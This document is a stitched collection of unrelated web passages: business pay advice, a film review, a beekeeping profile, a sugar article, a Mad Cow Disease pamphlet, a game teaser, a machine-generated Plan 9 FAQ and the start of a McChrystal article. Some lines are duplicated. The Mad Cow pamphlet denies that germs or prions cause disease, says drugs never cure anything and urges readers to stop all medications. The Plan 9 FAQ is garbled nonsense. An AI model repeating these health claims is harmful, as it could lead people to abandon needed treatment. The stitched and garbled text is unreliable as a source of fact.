That 's the least you should be paying yourself .
Remember your priorities .
Do n't lose sight of why you 're running a business in the first place -- to improve your quality of life .
Do n't lose sight of why you 're running a business in the first place -- to improve your quality of life .
Spread pay cuts around .
Take a 5 percent cut along with the rest of your staff , but do n't put a 30 percent pay cut on your own back .
Take a 5 percent cut along with the rest of your staff , but do n't put a 30 percent pay cut on your own back .
Ask yourself this question :
If your business does n't allow you to pay yourself a living wage , what are you doing wrong ?
If your business does n't allow you to pay yourself a living wage , what are you doing wrong ?
Remember :
There are no rich martyrs .
You have to take care of yourself first so you can stay sharp and become the kind of boss you need to be to take your business to the next level .
You have a duty to your business , your family and your employees .
Most of all , you have a duty to yourself .
You are the one who holds all the risk , so you should reap the rewards .
Movie Review F Jonah Hex Director Jimmy Hayward Runtime 81 minutes Rating PG - 13 Cast Josh Brolin , John Malkovich , Megan Fox
Advertisement
Bad movies are n’t what they used to be .
More specifically , bad movies that make it into theaters these days usually have a base level of competence that sets them apart from the bad movies of yesteryear .
Dullness dwells where incompetence used to call home .
The Raja Gosnells far outnumber the Ed Woods .
But every once in a while , a film limps into theaters so stitched together , it ’s a wonder it does n’t rip apart in the projector .
Jonah
Hex is such a film .
Loosely based on the adventures of a character introduced in the early 1970s as DC Comics ’ answer to grim spaghetti and revisionist Westerns , Jonah Hex is the dark story of a tormented bounty hunter with a badly scarred face ( Josh Brolin ) who wanders the West taking whatever jobs come his way , living like an exile from the human race .
No , wait , it ’s about the lighthearted adventures of a gruff , wisecracking , badly scarred bounty hunter who has all sorts of cool gadgets , like a horse outfitted with Gatling guns .
No , that is n’t entirely right .
It ’s the story of a disgruntled Confederate colonel ( John Malkovich ) who , on the eve of America ’s centennial , turns terrorist ( contemporary resonance ! ) and attempts to destroy Washington D.C. using a 19th - century super - weapon .
Only one man can stop him , the man he hates most in the world : an elusive , badly scarred bounty hunter who has the ability to briefly raise and converse with the dead , like Lee Pace in Pushing Daisies , but without the pies .
Advertisement
Rumors of trouble dogged Jonah Hex ’s production from the time its original directors , the Crank writing - directing team of Neveldine & Taylor , abandoned the project , up to when director Jimmy Hayward — an animation vet making his live - action debut — conducted last - minute reshoots with another director ’s help .
Trouble happens , of course , but the 81 minutes ( including credits ) of Jonah
Hex footage that made it to the screen look like something assembled under a tight deadline , and possibly under the influence .
One flashback makes three appearances .
A fight scene with no dreamlike elements , apart from a sky tinted red in post - production , repeatedly appears as a dream sequence .
A chunk of Hex ’s origin is told by way of animation for no apparent reason .
Narration comes and goes .
Whole elements , like Hex ’s supernatural powers and Megan Fox ’s prostitute - in - distress , could disappear without anyone noticing .
And that ’s without even mentioning the Native American village that shows up at random .
Or the CGI crows .
Or the acid - spitting snake - man .
( One element that occasionally gives the illusion of coherence : a neat spaghetti-metal score .
But even that was cobbled together from separate work by Marco Beltrami and Mastodon . )
Jonah
Hex is what happens when someone promises to deliver a releasable movie by a certain date , and then does n’t .
Ben Potter cannot keep the wonder out of his voice when he talks about his bees .
Ben Potter cannot keep the wonder out of his voice when he talks about his bees .
" It 's always daunting to start out when you put 15,000 bees in a hive , " said the retired obstetrician and gynecologist , who has kept bees for decades .
" It 's pretty impressive . "
Yet it is something Potter , who now lives in Kittery , Maine , has done time and again since adopting beekeeping as a hobby .
" I had been interested in keeping bees , so I thought about it for about 10 years , " Potter said .
" Then I thought , ' What a silly thing not to do , it could be fun . ' "
Certainly since starting his first hive more than 20 years ago in the Concord area where he practiced medicine , Potter has cultivated a true affinity with his bees .
" It gets to be a part of you , " he said .
" I really love to work with the bees . "
Although it is not " work intensive , " Potter said , a true beekeeper , or apiarist , must be attentive .
" Every two to three weeks you have to check in on them , " Pottery said .
" You have to make sure that the bees are in the hive and that the eggs have been laid ... "
In essence , that nature is taking its course .
In between , Potter , like many beekeepers , simply enjoys watching the industrious nature of the bees .
" You sit next to the hive and you watch those bees coming in with orange pollen on their legs , " he said .
" It 's just fascinating . "
In fact , Potter is still astounded by the intricate honeycombs the bees create .
" They make perfect hexagon cells on both sides of the paper , " he said .
" I never get used to how they do that . "
Especially since the thousands of bees in the hive can build that elaborate comb inside a beekeeper 's frame in a week to 10 days , he said .
" Bees are wonderful , " Potter said .
" They are nature at its best . "
Not only are they fascinating in the way they set up hives each bee with its own specific role — but all the while they are pollinating gardens within a mile or so the hive , they also often are making honey and beeswax that can be used for candles or soap .
In good years , Potter said he even has jarred enough honey to sell locally .
Most years , however , he said he gives away the honey harvested to family and friends .
Undoubtedly , the bee , and its industrious nature , is something that has been gaining increasing attention by hobbyists .
Potter said adult education classes that he has been teaching in Portsmouth , York and Kittery over the years now number up to 25 to 26 students per session .
" I 'm amazed at how the interest has taken hold , " he said .
That could be because increased attention has been paid to the Colony Collapse Disorder that affected bees in recent years , which raised concerns about the connection between the loss of bees as an impending threat to the food supply .
According to the U.S. Department of Agriculture , bee pollination is responsible for $ 15 billion in added crop value , particularly for specialty crops such as nuts , berries , fruits and vegetables .
The relatively low cost of starting up a hive — a few hundred dollars — as well as the increase in resources , such as classes and instructional DVDs , available to the hobbyist also probably have contributed to the resurgence in apiarists .
" Everybody who starts beekeeping needs a mentor , " Potter said .
" It 's like anything else , you have to have someone to ask questions of , someone to bounce questions off of . "
Undoubtedly Potter has done more than his part as an area mentor .
In addition to teaching the adult education classes he has mentored beginning beekeepers like Clark James of York .
" It 's great to have someone like Ben as a resource , " James said .
" He is invaluable . "
Since starting up his hives about four years ago , James said he and his neighbors have noticed a considerable increase in the yield of their gardens .
" It is incredible what a difference the bees make , " he said .
" People do n't realize how important the bees are in nature . "
Certainly apiarists like James and Potter do though .
" It 's fun , that 's the only reason you do it , " Potter said .
" You never stop learning , no matter how long you do it . "
In fact , Potter , considered an " expert " in the field by James and others , said beekeepers will tell you " no one really is an expert " when it comes to beekeeping .
Well , there is one exception .
As Clark aptly put it , " The only experts really are the bees . "
Think you have an idea for a future " Get off the Couch " column ?
Contact Rachel Collins at Rcollinsme@gmail.com .
The world is hooked on sugar .
Ray Kurzweil calls it the “ White Satan . ”
And he might be onto something .
The futurist guru has found overwhelming evidencethat consuming refined sugar is linked to cardiovascular disease , obesity , type - 2 diabetes and even cancer .
According to the American Heart Association ( AHA ) , women should consume no more than 6 teaspoons of sugar per day and men no more than 9 .
At 22 teaspoons of sugar consumed by the average American each day , it ’s no wonder that our excessive habit is so costly .
Scientific innovation is pushing human longevity past the traditional limits .
Yet despite this upward trend , we ’re still not much smarter about what we put in our bodies .
And , according to recent studies , food manufacturers and the U.S. government are n’t doing much to curb our voracious appetite for sugar .
We found a video featuring a talk by University of California professor Robert Lustig that exposes the bitter truth about sugar .
Make sure you check it out below .
Here at the Hub we think the world of technology .
It ’s thought that by the year 2030 there will be about one million people living in the triple digits .
If we lose a tooth because we ate too much sugar , we will one day replace it with our stem cells , but one simple truth remains : state - of - the - art medicine and brand - name prescriptions can ’t — at least not yet — compare to a good dose of common sense .
As the singularity ’s fiercest advocate , Kurzweil stands by the power of human reasoning , but he also might say that in the battle against sugar , willpower is n’t to blame .
The fight can seem futile at best for the more than 17 million Americans currently diagnosed with diabetes .
And it seems as though the U.S. government and product manufacturers are n’t doing their share to balance a system that caters hand and foot to sugar - holics .
For one , many foods that are n’t considered desserts actually contain more sugar than their seemingly sweeter counterparts .
Some foods considered more natural , like salads , might be higher in sugar if served with a sweet dressing .
There is n’t much to alert consumers to this misnomer .
In fact , the FDA has yet to issue regulations to control claims of what is and is n’t “ natural . ”
Sugar is everywhere .
The Centers for Disease Control and Prevention ( CDC ) lists the common aliases of sugar found in most food products , and links to resources that explain how to navigate those misleading product labels we frequently forget to read .
But what good is a nutritional label if it lists dubious information ?
The World Health Organization puts the safe amount of sugar in a healthy diet at no more than 10 percent , whereas the sugar industry in the United States has claimed that 25 percent of our diet can safely consist of sugar — a disagreement with an obvious agenda .
Sugar is subtle .
Manufacturers bombard us with half - truths and misleading information on boxes and product labels are skewed to make ingredients seem more benign .
It ’s been suggested , for instance , that nutritional information be made less confusing by replacing “ per serving ” quantities with what ’s present in the entire container for some products .
This popular breakfast cereal is described as “ lightly sweetened ” on the box , yet sugar is the second ingredient listed ( ingredients are generally listed in order of prominence ) .
Websites are no different .
Coca -Cola advocates for an “ active , healthy lifestyle ” on its nutritional information page .
Here ’s a novel idea : how about skipping soda altogether ?
Robert H. Lustig , MD , UCSF Professor of Pediatrics in the Division of Endocrinology would agree .
In a recent video presented by the UCSF ’s Osher Center for Integrative Medicine , Lustig exposes a few dietary myths , going so far as to call high - fructose corn syrup “ poison . ”
It ’s a long video , so if you do n’t have time to watch it through ( which you should ) , there are a few highlights not to miss : at 15:50 Lustig links Type II diabetes to sugar sweetened soft drinks ; find out how juice can cause obesity at 27:21 ; and at 34:50 who would have thought that doughnuts could unite the world ?
Check out the video below .
Sugar is addictive .
Sugar — along with chocolate , cheese and meat — releases an opiate - like substance that activates the brain ’s reward system .
So kicking the habit is n’t quite as easy as taking everything in moderation .
But we as consumers have more power than we think when it comes to dictating food industry trends , which could advocate for a healthier population in the long run .
Health and longevity is on everyone ’s mind .
But what good is immortality if we ’re riddled with disease and calamity — all because we ca n’t exercise a little discipline ?
What good is modern medicine when we demand no less than a miracle ?
Are we expecting technology to take the place of a healthy lifestyle ?
If we really want to live longer , we need to take responsibility for our bodies and stop expecting technology and medicine to clean up the mess when we ca n’t say ‘ enough is enough . ’
[ image credit : Yes - Zim.com ]
[ source : FDA , CDC , Life Extension Magazine , Coca - Cola , Purdue University , CSPI ]
Mad Cow Disease
What the Government Is n't Telling You !
Lorraine Day , M.D .
What is Mad Cow Disease ?
Mad Cow Disease is the common term for Bovine Spongiform Encepholopathy ( BSE ) , a progressive neurological disorder of cattle which can be transmitted to other species , including humans .
In humans , it is called Creutzfeldt - Jakob Disease , after the two doctors who first described the symptoms of the disease .
The disease in cattle is called Bovine Spongiform Encepholopathy because this form of the disease occurs in cows ( therefore , the term bovine ) , it causes a sponge - like destruction of the brain ( therefore , the term spongiform encepholopathy - enceph means brain and pathy means pathology - meaning an abnormality ) .
What are the symptoms of Mad Cow Disease ?
Symptoms include an excitable or nervous temperament to external stimuli such as touch to the skin , a progressive unsteadiness of gait resulting eventually in the inability to stand up .
The disease is virtually 100 % fatal .
The human equivalent of Mad Cow Disease , Cruetzfeldt - Jakob Disease , causes memory loss , emotional instability including inappropriate outbursts , an unsteady gait , progressing to marked weakness , severe rapidly progressive dementia and death , often within a year of the onset of symptoms .
What is the cause of Mad Cow Disease ?
Currently the most accepted theory is that the causative agent is a modified form of a normal cell surface protein called a prion ( pronounced PREE - ON ) protein .
Where did Prions come from ?
Are they a type of virus or bacteria ?
What are they ?
A prion is neither a virus nor a bacteria .
Prions are proteins that contain no DNA or RNA , two substances previously felt to be essential for reproduction of a living tissue .
Prions are normal constituents of the body when in their normal form or conformation , but they can become twisted in a conformational change ( a change in shape - in the way the molecule is folded ) , and then they are thought to cause disease .
How long ago were Prions discovered ?
In 1997 , Stanley Prusiner , M.D. , a professor of neurology at the University of California , San Francisco School of Medicine , won the Nobel Prize for his discovery of prions , " tiny protein molecules that seem to cause a variety of slow acting - and inevitably fatal - diseases in animals and humans ; the name is an acronym for " proteinaceous infectious particles . "
But the diseases found in association with these tiny protein molecules have been known for over 50 years .
In fact , the prion , as it has been named by Dr. Prusiner , may well have been discovered over 150 years ago , and re-discovered , every 25 - 50 years since then , by different scientists who gave the molecule different names .
Prions exist , but it is extremely doubtful that the Prion is the " CAUSE " of ANY disease .
Prions are much more likely to be the " RESULT " of a sick and dying body .
Prions are most probably a RESPONSE to the illness that was actually CAUSED by a grossly improper diet and other unhealthy lifestyle factors .
" Factory farming " of animals , with the massive use of hormones , pesticides and other harmful substances destroy the animal 's immune system .
When these diseased animals are eaten by people , then the people get sick and die .
When the animal 's immune system is suppressed because of a violation of the immutable natural health laws that govern the health of both animals and man , then the body produces the agent necessary to clean out the mess of dead and dying tissue resulting from the violation of these health laws .
You see , these supposed " infective agents " such as bacteria , viruses , fungi , and now Prions , are NOT the CAUSE of the diseases , they are the RESULT of a diseased body caused by the wrong diet and lifestyle .
These bacteria , viruses , fungi and prions are actually the " clean - up crew " , formed by the body , to get rid of the mess and clean out the body .
We have been taught that germs CAUSE disease .
But germs DON'T cause disease anymore than flies cause garbage !
This is explained in detail on my video " Drugs NEVER Cure Disease . "
Flies DON'T cause garbage - Garbage attracts flies !
A dead animal in the road attracts vultures !!
Vultures do n't attract dead animals .
It 's the same situation in the body .
When there is dead and dying tissue in the body , caused by an improper diet and lifestyle , the " clean - up crew is called in to get rid of the problem .
The body can produce its own " cleansing " agents ( such as bacteria , viruses , fungi and prions ) when the need arises .
Or these agents can be transmitted from others , or , as in the case of Mad Cow Disease , by humans ingesting prions by eating the flesh of the cow or other infected animal .
When these agents start cleaning out the toxins in the body , the toxins are dumped into the blood stream to be filtered and eliminated from the body .
These toxins then cause symptoms which the doctor diagnoses as " disease " and the doctor then NAMES the disease according to the symptoms it produces .
The medical and pharmaceutical establishment then tries to produce a DRUG to STOP the cleansing process , in order to STOP the patient 's uncomfortable symptoms .
But the drug NEVER cures the " disease " - it just stops the cleansing process so the patient 's body remains sick and filled the toxins , even though the patient may feel somewhat better - at least for a time .
If a person 's immune system is healthy because he has been eating and living properly , he has no need to produce these cleansing agents and will not be susceptible to them .
But if his body contains dead and dying cells and tissue from an improper diet and lifestyle , then these agents have a field day .
As they " clean out " the " garbage " in the body , the effect can be so severe , that the patient actually dies .
So these tiny infective agents can either be produced by the body itself , or transmitted or ingested into the body from the outside .
In the 1800's , Antoine Bechamp , a French physician and professor of biochemistry at a prestigious University medical school in France discovered a tiny particle that he named microzymas .
He found that these tiny bodies could change from one shape or form into another shape or form , depending on the condition of the person 's immune system .
About 70 years ago , an extraordinary scientist - inventor , Royal Rife , built possibly the world 's greatest microscope and observed what Bechamp had discovered , that these tiny bodies could change shape and form .
A bacteria could actually become a virus or a fungus , due to a conformational change .
In the last 40 years , Dr. Virgina Livingston , a physician , a professor at Rutgers University and an outstanding cancer researcher , discovered these same tiny bodies .
More recently , Gaston Naessens , a brilliant chemist and physicist now living and working in Montreal , Quebec , Canada built a super specialized microscope for studying these tiny living organisms , which he named somatids .
Over years of careful microscopic observation and laboratory experimentation , Naessens went on to discover that if and when the immune system of an animal or human being becomes weakened or destabilized ( by violating the 10 natural laws of health ) , the normal three - stage cycle of the somatid goes through thirteen additional successive growth stages , each form evolving into the next by conformational changes .
For more information on this subject , see my video " Sorting Through the Maze of Alternative Medicine : What Works , What Does n't and Why " where I discuss this subject in more detail and show graphics of the life cycle of the somatid .
I also reveal how you can eat and live so you will NOT be affected by these and other presumed infectious agents .
How do you know that the Prion , recently discovered by Dr. Prusiner is the same molecule as the somatid or the microzyma as named by the previous discoverers ?
Answer :
1 : It behaves in the same way .
It produces symptoms - " disease " - in a person whose immune system has been suppressed by violation of the natural health laws ( improper diet and lifestyle ) .
2 : It is found in contact with diseased tissue .
( Scientists think that because a prion is found in CONTACT with diseased tissue , that the Prion is the CAUSE of the disease .
But , in fact , it is the RESULT of the diseased tissue and NOT the CAUSE ! )
3 : Prions , somatids and microzymas have virtually the same physical characteristics - they CANNOT BE DESTROYED .
There is NO WAY to kill them .
Prions are NOT DESTROYED by fire , nor by freezing , nor by disinfectants , nor by operating room sterilization procedures , nor by incineration , nor by intense radiation .
In fact , scientists and government agencies HAVE NOT FOUND ANY WAY TO DESTROY THEM !!
Grinding up the dead cows and other animals who have died from Mad Cow disease , and then incinerating them WILL NOT KILL the Prion !!
How did this whole mess get started ?
Over 30 years ago , cattle and sheep ranchers and other producers of animals to be slaughtered and used for food , started " factory - farming " - raising the animals in penned areas , in very close quarters , and feeding them hormones and other chemical to fatten them up faster for market .
They had to give them huge amounts of antibiotics because the animals became so sick so easily because of their terrible living conditions ..
( Their Immune Systems were NOT working right . )
The ranchers also cut costs by feeding their animals ground - up dead animals , animals that have died of disease - as well as humane society animals , cats and dogs that have been euthanized .
ALSO being used as feed were road - kill and offal , parts of the animals not fit for human consumption .
This process of grinding up diseased , dead animals for feed for other animals is called " rendering . "
But sheep and cows are herbivores - vegetarians .
They are supposed to graze - to eat grass .
They are NOT meat eaters .
Their intestines and body systems cannot stay healthy when they are fed the wrong diet , especially when the ground up dead animals used for food , died from disease !
The equivalent disease in sheep is called " scrapie " because the diseased sheep scrape themselves against fences and other objects until they injure themselves .
They develop other neurologic disorders and eventually die - - - and THEN , the ranchers grind them up and feed them to cows , chickens , pigs ( and other animals to be used for human consumption ) and call the " feed " High Protein Pellets !
Then when the cows get sick and die from this horrible practice , they grind them up and feed THEM to OTHER cows and other types of animals being raised for human consumption .
What diseases in humans are associated with Prions ?
Creutzfeldt - Jakob disease ( CJD ) has been diagnosed in many countries in the world , including the United States .
Kuru , a neurologic disease , very much like CJD , has been present in New Guinea for many years .
It appears to be associated with cannibalism .
Gerstmann - Straussler - Scheinker ( GSS ) disease is manifested as a very unsteady gait plus other signs of damage to the cerebellum - a specific area of the brain .
The symptoms are very much like CJD .
GSS is also fatal .
Fatal familial insomnia in which dementia follows difficulty sleeping .
Are sheep and cows the only animals affected ?
No .
This same " feed " made of ground - up dead , diseased animals has been fed , and is still being fed , to other animals being raised for human consumption , including chickens and pigs .
Also deer , elk and mink have been found to have the disease .
What countries have been affected by Mad Cow Disease ?
The UK has been severely affected .
Germany , Italy and many other countries have also been affected .
Is Mad Cow Disease in the U.S. ?
The Government says there is no problem with Mad Cow Disease in the U.S.
However , they admit that cows in this country have already been diagnosed with Mad Cow Disease .
And there are alsoTHOUSANDS of " Downer Cows " in this country , cows that are well one day and dead the next .
When these " Downer Cows " are ground up and fed to other animals , the other animals develop the equivalent of Mad Cow Disease .
So the government , as always , is talking out of both sides of their mouth .
They are protecting the gigantic billion dollar meat and poultry industry rather than the American people .
What is the government doing to stop this dangerous feeding practice ?
They 're approaching it the same way they have handled the AIDS epidemic :
They LIE !
1. First , they deny that there is ANY problem .
2 . When the evidence becomes overwhelming that there is a BIG problem , they admit that there " might " be a problem , but they say they 're not sure , they are studying it and if there is a problem , it 's not a serious problem and there is no reason for alarm .
Keep eating what you 're eating , they advise .
3 . When people start catching on that there really is a problem , the government will admit that at first they were n't as vigilant as they should of been , but the people who were then responsible for investigating the problem are no longer with the government ( blame those guys - they 're gone ) and now the problem is " under control . "
And there is no cause for alarm .
Keep eating the stuff , they advise you .
4 . A number of years later they say , " Oh , we 've found out that there really has been a pretty big problem all along , but NOW we 've got it under control .
So there is NO cause for alarm . "
Keep eating the stuff , they advise you .
5 Then a year or two later they admit that it's in ALL the different breeds of animals , but it 's " low risk " and you probably wo n't get it so NO cause for alarm . "
Keep eating the stuff , they advise you .
6 . When the problem continues to grow , they start dividing the Prion diseases into different categories so no one specific category has too many people in it .
7 . When the problem becomes outrageous , they admit there 's a small , but controllable problem , and then they start covering up the true statistics - the REAL number of people who have the disease or who have already died from the disease .
Their plan ALWAYS is to keep the public calm as they die !
Would the government REALLY LIE to us ?
What is the evidence for a cover - up in Mad Cow Disease ?
1 . As of Jan 6 , 2001 , the Centers for Disease Control , a government Public Health organization , published on their web site : " BSE has not been shown to exist in the United States . "
" According to the Animal and Plant Health Inspection Services of the United States Dapartment of Agriculture , BSE has NOT been detected in the United States , despite active surveillance efforts for several years . "
However , the Centers for Disease Control ( CDC ) DOES NOT actively monitor the disease !
The REAL truth is : " A year before BSE was even reported in Britain in 1985 , Richard Marsh , Chairman of the Department of Veterinary Science at the University of Wisconsin - Madison , was alerting dairy practitioners of the possibility that a " previously unrecognized scrapie - like disease in cattle " existed in the United States .
The clue came in 1981 when " Mad Mink Disease " wiped out a population of minks in Wisconsin who had n't eaten any sheep at all .
The meat portion of their diet consisted almost exclusively of dairy cattle called " Downers , " an industry term describing cows which collapse for unknown reasons and are too sick to stand up .
BUT - the beef industry claims that " Downer Cows " DO NOT have Mad Cow Disease !
YET - when these Downer Cows were ground up and fed to mink - the mink DEVELOPED " Mad Mink Disease ! "
In June 1992 , a USDA consultant group decided that changes in the research program to accommodate the possibiity that BSE was already present in the U.S. were , " not appropriate at this time . "
The panel that made this decision included representatives of the National Milk Producers Federation , the National Renderers Association , the American Sheep Industry Association and the National Cattlemen 's Association .
( By the way , Beef is the largest revenue source for American agriculture nationwide .
It is a $ 150 billion dollar industry .
Since the FDA protects the pharmaceutical industry , the very industry that it 's supposed to police , why would n't the USDA ( U.S. Dept of Agriculture ) protect the Beef and Sheep Industry , even though the USDA is supposed to CONTROL it ? )
According to the USDA , " virtually all U.S. feed manufacturers use meat and bone meal in their feeds " and most U.S. cattle are fed such rendered animal tissues .
In 1989 alone the U.S. rendered two million tons of cattle for use primarily in animal feed and pet food .
There has been a substantial increase in the use of animal protein in commercial dairy feed since 1987 .
Dr. Gibbs , who recently chaired a World Health Organization investigation into the disease says " Do I believe BSE is here in the U.S. , of course I do , " Gibbs made this admission at a University of Wisconsin symposium .
With more than two decades of prion research behind him , Dr. Stanely Prusiner , the scientist who coined the term " prion " and received the Nobel Prize for his work , agrees that Mad Cow Disease MUST be present in the U.S. "
In late 1978 , Dr. Masuo Doi , a veterinarian with the Food Safety and Quality Service , studied a disorder in some young hogs that had arrived at a Packing Plant in Albany , N.Y. from several Midwestern states .
The USDA 's pathologist reported that the damage in the pig 's brain was similar to the damage observed in the brains of sheep afflicted with scrapie , essentially the same disease as Mad Cow Disease ( BSE ) in cows .
Finally , the FDA drafted a rule that would ban the fortifying of animal feeds with " any Mammalian tissue . "
However , the FDA has played a taxonomical shell game by ARBITRARILY REMOVING PIGS FROM THE CLASS OF " MAMMALIA . "
They declared that a pig is NOT a mammal !
A single teaspoon of ingested high infectivity meat and bone meal is thought to be enough to cause BSE in a cow .
" One hundred thousand cows per year in the United States are fine at night , but dead in the morning .
The majority of those cows are rounded up , ground up , fed back to other cows .
If only one of them has Mad Cow disease , it has the potential to infect thousands . " says Howard Lyman , Cattle Rancher for 40 years .
Mad Cow Risks were First Reported in the United States in 1976 !!
" Health experts ... knew of the potential dangers of contaminated human growth hormone years before the first Creutzfeldt - Jakob death occurred and experimental programs halted , British court documents reveal .
Correspondence dating from the mid- ' 70s presented to a British judicial inquiry reveal a paper trail betwen the United States National Institutes of Health and the British Government indicating the infectiousness was foreseen , " the Los Angeles Times reports .
" Moreover , a safer method for purifying human growth hormone drugs had long been available , but scientists involved in the experiments had ignored it in favor of a cheaper , less labor - intensive option . "
In 1989 alone almost 800 million pounds of processed animals were fed to beef and dairy cattle in the U.S. .
The USDA has conceded that " the potential risk of amplification of the BSE agent is much greater in the United States " than in Britain .
In 1995 five million tons of processed slaughterhouse leftovers were sold for animal feed in the United States .
Rendering is a $ 2.4 billion - a- year industry .
" There is simply no such thing in America as an animal too ravaged by disease , too cancerous , or too putrid to be welcomed by the embracing arms of the renderer .
In addition to diseased farm animals , the city of Los Angeles sends some two hundred tons of euthanized cats and dogs to a rendering plant every month .
Added to the blend are the euthanized catch of animal control agencies and roadkill " according to Howard Lyman , a cattle rancher for 40 years .
This is the food fed to the animals that YOU EAT !
In the U.S. the rendering industry promised to stop feeding sheep brains to cows years ago ; the FDA confirmed that this ban failed .
Unfortunately just about everybody lies .
" British government officials misled the public for years over the dangers of British beef and the risk of " mad cow " ( BSE ) disease spreading to humans , " according to Reuters wire service .
" UK Physicians Told Not to Tell Hemophilia Patients of Possible CJD Blood Concerns . "
" Mad Cow - BSE - CJD Now Likely to Be a Global Infection " according to New Scientist journal .
BSE has infected a dozen species of animals which presumably ate infected tissue .
Is Cow 's milk safe ?
What about cheese ?
Although there is a case description in the New England Journal of Medicine ( 1992 ) in which colostrum from a Creutzfeldt - Jakob diseased woman was found to be infectious to mice , cow 's milk is considered " safe " by the World Health Organization .
In the largest known U.S. outbreak of cases of CJD to date , in Pennsylvania 's Lehigh Valley , the disease was linked to , among other things , cheese consumption .
What about other animals ?
Are they infected too ?
Paul Brown , medical director for the U.S. Public Health Service , believes that pigs and poultry could be harboring BSE and passing it on to humans , adding that pigs are especially sensitive to the disease .
Two epidemiological studies found pork to be a dietary risk factor in Creutzfeldt - Jakob Disease ( CJD ) .
The most common misdiagnosis of CJD is Alzheimer 's disease .
How can Prions be destroyed ?
They CAN'T !
The English government destroyed over 4.5 million cattle and incinerated them at a temperature of 1100 degrees centigrade .
The resulting ash is still considered infectious and is stored in WW ll blimp hangers .
Mad Cow disease can be passed from the mother to the fetus in the womb .
It can be passed from a bull to the cow through sperm .
It can be passed from one species to another quite freely by transfusion of contaminated blood or consumption of infected material .
BSE is extremely resistant to high temperatures ; it is unaffected by radiation , laboratory solvents and bleaches .
In other words , it appears to be virtually indestructible .
How long is the incubation period for " Mad Cow " Disease in humans ( also called CJD ) ?
It is estimated that it may be as long as 20 - 40 years .
But teen - agers and young children have also died of it .
So it can occur much more rapidly than previously thought .
An infected cow shows the symptoms of BSE four to seven years after the time of infection .
How are the government and the cattle industry trying to " muzzle " truth - tellers about the risks of Mad Cow Disease to the population of America ?
Certain states , including Texas , have passed Food Disparagement Acts .
Texas , Oklahoma , Colorado and North Dakota corporate growers of vegetables and fruits have won passage of laws making it a crime to falsely denigrate fruits and vegetables .
Then the corporate farming industry in conjunction with the government , conspire to cover - up , distort and withhold the facts from the public .
So a whistle - blower who is telling the truth , trying to warn the public , is a " sitting duck " for a law suit .
The cattle industry sued Oprah Winfrey and her guest , Cattle Rancher Howard Lyman , because they told the truth about the cover - up of Mad Cow Disease .
Even though Oprah Winfrey and Howard Lyman won the court action , the cattle industry wanted to send a strong message of intimidation to anyone else who might even think about speaking truth .
Fortunately , in the U.S. , Truth Telling is still a legitimate defense , at least for the time being .
What other products or procedures are potentially dangerous ?
Vaccines , cosmetics , human growth hormone , thyroid hormone , albumin ( a blood product given in hospitals ) , blood transfusions , vitamin and mineral supplements , gelatin in thousands of processed foods , corneal transplants , surgical instruments , estrogen , progesterone , cortisone , heparin , Vitamin B12 , insulin , gelatin in pill capsules , yogurt , ice cream , butter , chewing gum , lard , margarine , shortening , egg substitutes , gravy mixes , cake mixes , whitener in refined sugar ( it 's from bones ) , gelatin desserts , marshmallows , mayonnaise , sausages and sausage casings , medicines , pet foods , and many other products .
What can we do ?
1. DON'T believe the government .
They have no interest in protecting you .
They are protecting big business and their own jobs .
2. Stop eating ALL animal products .
Stop eating meat , poultry , dairy products and eggs .
3 . Stop eating processed food .
Most of it contains animal products , even though you would never suspect it .
4 . Do not assume animals in the wild are not infected .
They are .
5 . Stop eating sugar or sugar containing foods .
Sugar is " whitened " with bone meal .
6 . Start eating a diet of fruit , grains and vegetables in their most natural form .
The plan is on my videos " You Can't Improve on God " and " Diseases Don't Just Happen . "
This plan will allow you to be FREE of ALL disease , not just " Mad Cow Disease . "
7 . Make a determination to eventually get off all medications .
( Do n't stop them abruptly .
That can be dangerous )
Many medications contain animal products .
In addition , drugs NEVER cure disease , and they ALL have dangerous side - effects .
When you start following the Ten Natural Laws of Health as detailed on my video , " You Can't Improve on God " you will eventually be able to slowly decrease your drug dosages and then stop them entirely .
Mad Cow Disease will be a Global Epidemic that will make AIDS look like a " walk in the Park . "
But YOU can be safe from the danger .
You do n't have to be afraid .
If your immune system is working properly because you are eating the right diet and living the right lifestyle , disease can't touch you .
Learn how to rebuild your immune system and the immune system of those you care about .
The plan is very straight - forward and EVERYTHING in the plan is FREE , except for food , and you have to buy that anyway .
The Plan to REBUILD your IMMUNE SYSTEM by natural methods is on my videos " You Can't Improve on God " and " Diseases Don't Just Happen . "
www.drday.com
To Order Videos
Call : 1-800-574-2437
Addendum :
June 9 , 2010 - TF2 Team
Big things are happening RIGHT NOW at Valve .
Things involving cultivated tree - fruit .
BIG things .
Things that rhyme with " grapple . "
Things that rhyme with " Speem Gortress zmavailable on the Babac . "
Not today .
But tomorrow .
BIG THINGS .
Stay tuned ...
Compiled by the tireless Mark V. Shaney .
Question : What is Plan 9 ?
Answer : Plan 9 is a new user interface in which any word on the screen can be imported from another machine .
Answer : Plan 9 is a programmable debugger that understands multiple - process programs , and except at its own console , it does n’t run as an exercise in understanding the principles and mechanisms useful in designing operating systems , and not as a product as such .
In this way it is analogous to the Unix operating system .
In the most general configuration , it uses three kinds of networks , including Ethernet , Datakit , specially - built fiber networks , ordinary modem connections , and ISDN .
In Plan 9 , each network presents itself as a product as such .
Question : What GUIs does it use ?
Answer :
The standard interface does n’t use icons ; Plan 9 people tend to be local files .
Question :
How does it need ?
Answer :
As might be expected , the answer depends on what kind of information appear to users and to a program on another machine .
Plan 9 window system can grow .
That is besides creating , deleting , and arranging the windows themselves its job is be a server for translating human - readable addresses to network - specific ones .
As a result , applications do n’t even know whether the network interface files can be monitored by running it under a server that runs on Plan 9 , so that file systems of Unix machines may be running on a hardware plaform different from its own .
As a side benefit , this approach means that the window system has been built over the past several years by the Computing Science Research Center of AT&T Bell Laboratories as an exercise in understanding the principles and mechanisms useful in designing operating systems , and not as a command by clicking on it , and any string can specify a file with a library that emulates the Berkeley socket interface .
The system supports the graphics primitives and libraries of basic software for building GUIs , and if need arises , the X window system can grow .
Question : Who is using Plan 9 ?
Answer : Plan 9 people tend to be negotiated .
Just as in the Unix environment .
Data structures and protocols are designed for distributed computing on machines of diverse design .
Except for necessarily machine - dependent parts of the past .
Question :
Is it object - oriented ?
The Real News From The McChrystal Interview : The Troops Are n’t Happy
Stanley McChrystal 's fate is the story of the day , but there 's a broader message in the Rolling Stone story , and it has broad implications for the future of the Afghan War .
Doug Mataconis · · 9 comments
While everyone is concentrating , rightfully , on the scandalous and possibly insubordinate comments that are peppered throughout the Rolling Stone story about General McChrystal , there ’s another story there too ; the troops on the ground are not happy about the counter - insurgency strategy that McChrystal created :
Despite the tragedies and miscues , McChrystal has issued some of the strictest directives to avoid civilian casualties that the U.S. military has ever encountered in a war zone .
